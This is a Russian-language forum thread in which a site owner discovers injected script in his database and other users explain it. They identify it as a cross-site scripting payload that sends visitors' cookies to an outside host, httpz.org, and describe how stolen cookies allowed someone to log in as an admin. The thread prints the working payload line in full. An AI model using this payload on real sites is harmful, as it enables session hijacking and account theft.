[мошенник] <script>img = new Image(); img.s
Добавлено 18.07.14 в 12:41:16:
он попал в бд в таблицу я его убррал
может это определние нового класса или метода точно не помню)
$img = new imgage();
или это вообще код js
говно хацкеры завелись у тебя.
Ничего! Если нет хсс и евал функции в выводе
Добавлено 18.07.14 в 12:45:15:
о, смайлы заработали :\D
Добавлено 18.07.14 в 12:45:25:
:\(
[мошенник] Green Hornet, но он смог каким-то образом поставить себе мд
[мошенник] Green Hornet, проверял все есть тобишь только админы это могут делать, на мой акк никто не заходил
Добавлено 18.07.14 в 12:48:55:
короче он был мд когда я снял им всем он еще както мд себе сделал
Добавлено 18.07.14 в 12:50:20:
опа вот и сам код нарыл
Добавлено 18.07.14 в 12:50:23:
<script>img = new Image(); img.src = "http://httpz.org/nufw40hn94p.gif?"+document.cookie;</script>
artemas, Кто то у тебя куки хотел увести, или уже увел
Этим кодом админку никак не получить. Твой скрипт уязвим.
Green Hornet, Еще как можно. Слил куки, залил себе в браузер, и зашел с админа. Видимо так и получилось у автора.
[мошенник] Миледи, значит у автора есть xss так как куки просто так не слить, либо автор зашел куда то не туда.
